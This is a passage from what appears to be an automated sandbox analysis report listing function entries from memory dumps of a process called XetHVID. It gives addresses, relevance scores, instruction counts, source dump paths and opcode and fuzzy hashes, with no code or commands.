                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf7596346ab75817f6bc21747afd38d352862aeba6849aa2320e218fa8abe6e5
                                                                  • Instruction ID: be4d3789a70d7c5f8812c79a2e8bc387af3e65fed52d006bb90473574d7e04f9
                                                                  • Opcode Fuzzy Hash: cf7596346ab75817f6bc21747afd38d352862aeba6849aa2320e218fa8abe6e5
                                                                  • Instruction Fuzzy Hash: 5171E374B002159FEB00EB64D455B9EBBB2FF89300F1489A9D8899F396CB346D46C791
                                                                  Function 073C778F Relevance: .2, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51ccdb29ddda4cdba7df156d4573db467e04f25f5bb828d1637a73620203ffa9
                                                                  • Instruction ID: dae40dbe2d8e3436711eb60538786351397e29b88552a1baa10376f49d393e17
                                                                  • Opcode Fuzzy Hash: 51ccdb29ddda4cdba7df156d4573db467e04f25f5bb828d1637a73620203ffa9
                                                                  • Instruction Fuzzy Hash: BA71D374B002159FE700AF64D455B9EBBB2EF89300F0489A9D8899F396CB346D45C7D1
                                                                  Function 073C77C8 Relevance: .2, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9faaac63be3bb93ab22ee35a38ba8d5a99ed90a650842aac56a01fa07b96cb99
                                                                  • Instruction ID: 0350fcdf24b5cd9373765b17fee490f9491ff81aade9f29cc675d1241262fb72
                                                                  • Opcode Fuzzy Hash: 9faaac63be3bb93ab22ee35a38ba8d5a99ed90a650842aac56a01fa07b96cb99
                                                                  • Instruction Fuzzy Hash: 6661C174B002159FEB00AFA4D445BAEB7B6FF88300F1489A9D9895F386CB746D46CBD1
                                                                  Function 073C3478 Relevance: .2, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e1601011ac7d07f4cab57d8ef8d11d92c48bf3e8de9fb47558a56fc3e42e817
                                                                  • Instruction ID: 877ee42181b4acc2f3341fce88b68baafd1cddf80198d1b392ef794db175070e
                                                                  • Opcode Fuzzy Hash: 0e1601011ac7d07f4cab57d8ef8d11d92c48bf3e8de9fb47558a56fc3e42e817
                                                                  • Instruction Fuzzy Hash: D45169F1E00205DFEB15DB68D4986AEBBB2EF89214F15806EE509AB361DB31CC45CB52
                                                                  Function 0563DD04 Relevance: .2, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 067ea8e83aa35d8f1482cad808e0d15228c7014280e66414b543f3482f92bbec
                                                                  • Instruction ID: 6426e88a9c775b01c61ec1f6f5afedc21286e1282934fd7b48dcd08a11bf9fb0
                                                                  • Opcode Fuzzy Hash: 067ea8e83aa35d8f1482cad808e0d15228c7014280e66414b543f3482f92bbec
                                                                  • Instruction Fuzzy Hash: 805170B1E002599FCB14DFA9C849AAFBFF9EF88310F10842AE415E3340DB749905CBA0
                                                                  Function 073C0C38 Relevance: .1, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd3d8f806a326a237e5fdb9394a2a8a53ee44c5b2923dde2726636a0025f8ca6
                                                                  • Instruction ID: 0cdd54cda260772ecc4f8fd341485e411980a0145424d3d19b3dbeb1cdf30ba4
                                                                  • Opcode Fuzzy Hash: dd3d8f806a326a237e5fdb9394a2a8a53ee44c5b2923dde2726636a0025f8ca6
                                                                  • Instruction Fuzzy Hash: 0151F975A1060ACFDF04EFA8C8949ADF7B5FF89210B108669E456B7314EB30ED85CB90
                                                                  Function 08CFB670 Relevance: .1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a5a16631c5b0ec535dea78856e6a51020e7843869d5914bd559122d5dafcdc6
                                                                  • Instruction ID: 6f6ac27987e3bdb0bf8959087211fa8ec9d0dea2a1e70ca74ced0c5b1d47afb7
                                                                  • Opcode Fuzzy Hash: 3a5a16631c5b0ec535dea78856e6a51020e7843869d5914bd559122d5dafcdc6
                                                                  • Instruction Fuzzy Hash: B5410B71F4413E9FEB81AF69C8456EA3BB0AF44342F118435E705E6357EA308A22CBD1
                                                                  Function 073C1800 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8438e6e3a44475679123d61721de8e827599502897806ad4c4aefc463939d82b
                                                                  • Instruction ID: 0cf8b300754f40f9fbbfbafbb66576373ec33b7fe800d7cb1bcb98a65bf6b3c9
                                                                  • Opcode Fuzzy Hash: 8438e6e3a44475679123d61721de8e827599502897806ad4c4aefc463939d82b
                                                                  • Instruction Fuzzy Hash: E9418FF4A2130A8BEB18DF68D554A6EBBB6EF89301F144069E40AD7391DF34DC41DB91
                                                                  Function 073CC092 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1bfb6af0e08c6b56f1db46e26789b937ccd22f813cdba85053fba4d424d2cc1
                                                                  • Instruction ID: 66658d82a34c4d28d0cca24c508551810a9200412da1baa6060f1da40e236b86
                                                                  • Opcode Fuzzy Hash: e1bfb6af0e08c6b56f1db46e26789b937ccd22f813cdba85053fba4d424d2cc1
                                                                  • Instruction Fuzzy Hash: 8141B2F1A28159CBFB10CAEE88506BAB7BCAB47210F14A06FD41EC7A45D735DD4487B2
                                                                  Function 073C0E40 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aebf050441ad4b79f1ab8e57484b4d1bd4bb36a94e8103bef697caa3f760fd1d
                                                                  • Instruction ID: 9b5570932f4642ba2711870f1de9bcc282b53e408518695b598f241cbcd74422
                                                                  • Opcode Fuzzy Hash: aebf050441ad4b79f1ab8e57484b4d1bd4bb36a94e8103bef697caa3f760fd1d
                                                                  • Instruction Fuzzy Hash: 68519635B10609DFCB04EFA8D8849EDF7B5FF89304F00855AE505AB325EB31A945CB91
                                                                  Function 08CFC070 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e501f9b2f075d7a81469e5b082ea1ca0b508e2f62d6f4750ca3839f76d850c8b
                                                                  • Instruction ID: 3bd5c8924233d96853bdb079dbb291a4d4d7f7693740d165d1131e69d2644184
                                                                  • Opcode Fuzzy Hash: e501f9b2f075d7a81469e5b082ea1ca0b508e2f62d6f4750ca3839f76d850c8b
                                                                  • Instruction Fuzzy Hash: D5412E70F4423E9FEB81AF65C8456EA3BF0AF45341F118476E641E7397E6348A22CB91
                                                                  Function 0563AF58 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42032802e9cbc678db927f411521388ecaa55d5d075354b8bbc5e60c80c43f5f
                                                                  • Instruction ID: d8aa4d073e75850d52ac3926aa8173907f16aaaecbdee20876b6ea1183ac00d4
                                                                  • Opcode Fuzzy Hash: 42032802e9cbc678db927f411521388ecaa55d5d075354b8bbc5e60c80c43f5f
                                                                  • Instruction Fuzzy Hash: A441BF75E002148FCB14EBB9C0957EDBBB2EF88351F14442DD902AB3A0DB744981CBE9
                                                                  Function 073C0C2A Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6210a35716971a4dbd2383da1b9999439d565c344908362359a752115603ec6e
                                                                  • Instruction ID: 37859d925b535d78ed94e2b6f35debaf70bd40a4ae097b40b1f34b1f5cc61420
                                                                  • Opcode Fuzzy Hash: 6210a35716971a4dbd2383da1b9999439d565c344908362359a752115603ec6e
                                                                  • Instruction Fuzzy Hash: 5F416C75A0060ACFDF14DFA8C8845ADFBB1FF89210B108669D45AEB315EB30ED85CB90
                                                                  Function 08CFB6A0 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43748aed223fb1e61c91f318b469961a4aa5dc35552e10441fc764007407a379
                                                                  • Instruction ID: deb0e0195df8fb965c7c1d04f329f80976d212bca8c02a16ccf072ce2f5df0f2
                                                                  • Opcode Fuzzy Hash: 43748aed223fb1e61c91f318b469961a4aa5dc35552e10441fc764007407a379
                                                                  • Instruction Fuzzy Hash: B441A770F4412E9BEB85AF65C8457EA77B0AF44342F118435E602E7396FA34CA228A90
                                                                  Function 08CFAF90 Relevance: .1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fcbea597ff8b68e49fd13c98896460c69de96f15926fd4e2d4483e523492a98
                                                                  • Instruction ID: c53d3ba5c8d5d8fd2c3886554fc18310c37c5b84ae15fda7be37f6125e8be8d9
                                                                  • Opcode Fuzzy Hash: 0fcbea597ff8b68e49fd13c98896460c69de96f15926fd4e2d4483e523492a98
                                                                  • Instruction Fuzzy Hash: 3F415371E04218CBEF209FA5D9445ADFFB2FF88315F218269E5457B256CB3189A2CF41
                                                                  Function 0563ED95 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6968d9f1a1cf8395bc75bae0458b21edeca6f0a668af3e19cacdc1da1a42072b
                                                                  • Instruction ID: 4d12683f6a6d81ed18f08b14ae8c4d3b57f95fba491ec2728c4912001ae15c16
                                                                  • Opcode Fuzzy Hash: 6968d9f1a1cf8395bc75bae0458b21edeca6f0a668af3e19cacdc1da1a42072b
                                                                  • Instruction Fuzzy Hash: F95123B1D05308DFDB20DFA9C584A8EBFB5FF48304F25842AD409AB251D7766A4ACF90
                                                                  Function 08CFAC68 Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f19c87b2ce45ad6472419dab649b348782c416233b6597ca8708043cd78c37ad
                                                                  • Instruction ID: ed1fa05eac7237da823281e25a17dce350445545baab018bb91f3334755323ab
                                                                  • Opcode Fuzzy Hash: f19c87b2ce45ad6472419dab649b348782c416233b6597ca8708043cd78c37ad
                                                                  • Instruction Fuzzy Hash: D4417D35A002189FEB44DFA8C850ADCFBF2EF89306F158169E541BB3A1DB31D945CB50
                                                                  Function 08CF37A7 Relevance: .1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ead64129139b6d6f4dbb036743deb638c47db771a45d5d204bd94d640e743e88
                                                                  • Instruction ID: 4379c3da87d8c07702296818b5ec50d5537899f25ea92856422335806c175251
                                                                  • Opcode Fuzzy Hash: ead64129139b6d6f4dbb036743deb638c47db771a45d5d204bd94d640e743e88
                                                                  • Instruction Fuzzy Hash: D2414C70600219EFDF059F68E844AAE7BB6FF84711F14802AF90697395CB34DE56CBA0
                                                                  Function 08CFAC78 Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7bc359e984aa30f35965e452e1080153ce23c4daa49d0a0148e45ae4bb638c11
                                                                  • Instruction ID: a5d6fde4001c452515dfa0b670198a8eb3906e14059413ee8b3e23f039ebec4f
                                                                  • Opcode Fuzzy Hash: 7bc359e984aa30f35965e452e1080153ce23c4daa49d0a0148e45ae4bb638c11
                                                                  • Instruction Fuzzy Hash: 6E416A34A002189FEB44DFA8C850AADFBF2EF89316F148169E541BB3A1DB30A941CB50
                                                                  Function 056375AC Relevance: .1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e38f8657576843a67ce58b59481201bb9c63207bac8839afb9e1d2a9b49ee357
                                                                  • Instruction ID: d1ef18def6e56f318381bed7068973c627044f00a0ca5a8540cc28e6905fcb14
                                                                  • Opcode Fuzzy Hash: e38f8657576843a67ce58b59481201bb9c63207bac8839afb9e1d2a9b49ee357
                                                                  • Instruction Fuzzy Hash: 0A31A1357001008FCB54EBBDC855AA9B7F6EF89625B14067DD55ACB7A0DB31DC02CB50
                                                                  Function 073C7A46 Relevance: .1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1446fb62ccf8acb5ecb1e9626131016cb85797aa73c359852776d7def576637c
                                                                  • Instruction ID: 697f790b08432569272be816ceded48320a059b778a8222a2461a4c2d55fc9cd
                                                                  • Opcode Fuzzy Hash: 1446fb62ccf8acb5ecb1e9626131016cb85797aa73c359852776d7def576637c
                                                                  • Instruction Fuzzy Hash: B131E6F56293918FD701DB78981926D7FB5EB46322F1504DBE846CB382CE344D418B72
                                                                  Function 073C6B3C Relevance: .1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6baf3dfe52be17bde2b7bf8c14663a23a5cbcce6d1a49a1882a32b03698f46de
                                                                  • Instruction ID: e515e55c17683b7b27c2ffe3f8f494e12e963ca97537aa99380a90a6b8c597de
                                                                  • Opcode Fuzzy Hash: 6baf3dfe52be17bde2b7bf8c14663a23a5cbcce6d1a49a1882a32b03698f46de
                                                                  • Instruction Fuzzy Hash: AC41B1F0614109DFE700DF58C4926AEBBB5EB8A314F14C46ED05EABB41CB369D468BA1
                                                                  Function 073C1198 Relevance: .1, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e98728cbf62850dc92e10d2a140ff76cf9a059b5ffafee4138bf141da007439f
                                                                  • Instruction ID: 07a82a0274b2ba98edddef4c0becb56e5444ad34082ec1ac84c40e940fad52fb
                                                                  • Opcode Fuzzy Hash: e98728cbf62850dc92e10d2a140ff76cf9a059b5ffafee4138bf141da007439f
                                                                  • Instruction Fuzzy Hash: 08319FB5A10219DFDB14DFA8D84499DBBB6FF88311F00826AE409E7360DF709C41CB91
                                                                  Function 073CC110 Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d33deb01d80604ce5aa807e6823c2fc6b320278654a662cc3bab1aeb5232d136
                                                                  • Instruction ID: 0e957cb45d96cd35edc06b7dc91c0fb3bc0bfa1606aa24026abf20e75a1e7947
                                                                  • Opcode Fuzzy Hash: d33deb01d80604ce5aa807e6823c2fc6b320278654a662cc3bab1aeb5232d136
                                                                  • Instruction Fuzzy Hash: BA3161F0A28119CBEB10CADEC8406BAB6B9EB47250F00A16FD51EC6A45C374DE4187B6
                                                                  Function 08CF7CCF Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a135aced1c64b8d3ed894e84997366d4e577fd7bf81051f9353a930e1181cf9
                                                                  • Instruction ID: b23d2cdafeca19b23cc5fe338a25dd9288805541f0a3b485f6a4af0d0a8b3e58
                                                                  • Opcode Fuzzy Hash: 9a135aced1c64b8d3ed894e84997366d4e577fd7bf81051f9353a930e1181cf9
                                                                  • Instruction Fuzzy Hash: DB31BC36A10211CFE714DF28C488AA9BBF2FF49B01F1544AAD509DB366CB719D02CBA1
                                                                  Function 0563EDA0 Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 487cd9fe46d6e1d736d4623eba78c480cff2703044d25844ed975bee07d3484a
                                                                  • Instruction ID: 3b79afd9e764848c430e1f4f909578213fd6071fb9a199ba6039dec50495e5e6
                                                                  • Opcode Fuzzy Hash: 487cd9fe46d6e1d736d4623eba78c480cff2703044d25844ed975bee07d3484a
                                                                  • Instruction Fuzzy Hash: 7841C2B1D01309DBDB24DFAAC585ADEBBB5FF48304F24842AD409BB250D7756A4ACF90
                                                                  Function 073CA2E0 Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c63228e6984cf13b10470e4bfff6e2fb0043ab61a1df204423914cfb8cc6b7a
                                                                  • Instruction ID: 840982ff641eae6405498a0478b32113a8f142cbd1c64e5f45c9a5d14b0e1efc
                                                                  • Opcode Fuzzy Hash: 0c63228e6984cf13b10470e4bfff6e2fb0043ab61a1df204423914cfb8cc6b7a
                                                                  • Instruction Fuzzy Hash: DD3138B1900309AFDF14DFA9D845A9EBFF5EB48320F10842AE819E7310D735A940CFA1
                                                                  Function 0563DCF8 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42d44cac6cc7d767eb0c679d3afc57405ee763a5029ee6c273e85aceae0aab40
                                                                  • Instruction ID: 8ad58025a0790e6162d0679c4bd6c849ea7bd86dcc071e9e684bc779632e335b
                                                                  • Opcode Fuzzy Hash: 42d44cac6cc7d767eb0c679d3afc57405ee763a5029ee6c273e85aceae0aab40
                                                                  • Instruction Fuzzy Hash: 2341BFB0D00358DFCB14CF9AD985A9EFBB5BF88310F20812AE419BB254D7756845CF91
                                                                  Function 073C2D88 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 38850027cbc370d48edf5e25a8d81aac30b7f0818a3937eb6ce73f930c14ed35
                                                                  • Instruction ID: 816a5261bd7d004a1fd349e91cca978d206dd0f7516b4cf3acb2f28681044c59
                                                                  • Opcode Fuzzy Hash: 38850027cbc370d48edf5e25a8d81aac30b7f0818a3937eb6ce73f930c14ed35
                                                                  • Instruction Fuzzy Hash: 4F3181B1601205AFEB14DF69C844BAFBBF6FF88300F14852EE44AA7290DB759D41CB90
                                                                  Function 08CFC4B8 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41a6514b429999b4ca47be5c6e41dccf7ef97da66fb6b8f3fd7e22b22a5f9c5c
                                                                  • Instruction ID: 25e42f99350d7c0fd78ebb0d99ac6b928607c4d923d702e1eb20c22038ea1019
                                                                  • Opcode Fuzzy Hash: 41a6514b429999b4ca47be5c6e41dccf7ef97da66fb6b8f3fd7e22b22a5f9c5c
                                                                  • Instruction Fuzzy Hash: 64316A31A001188FDB54DFA8C944AEDBBF1EF49305F2445AAE605EB361DB31DE41DB60
                                                                  Function 073C22F0 Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 169d5d8f8079d13de8b25b4c060a71914b3b2634dedc226a14e8e6c5b5bb7316
                                                                  • Instruction ID: 8ec26070ed272edcff2092d51d4d5b99443392393cd2fe07dbe8a4715e0b93cd
                                                                  • Opcode Fuzzy Hash: 169d5d8f8079d13de8b25b4c060a71914b3b2634dedc226a14e8e6c5b5bb7316
                                                                  • Instruction Fuzzy Hash: 3031ADB13103018FEB14DF68E880A6BB7E6FB89211F548469E80ECB355DF319C428B61
                                                                  Function 08CF7D17 Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
